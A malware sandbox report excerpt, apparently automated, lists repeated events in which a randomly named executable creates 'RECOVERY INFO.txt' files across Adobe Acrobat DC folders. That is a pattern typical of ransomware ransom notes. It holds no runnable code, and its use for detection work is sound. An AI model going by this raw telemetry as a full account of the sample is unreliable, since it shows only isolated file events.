Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\private\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\prod\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\stage\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\hi_contrast\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\hi_contrast\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\dev\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\hr-hr\RECOVERY INFO.txtJump to behavior
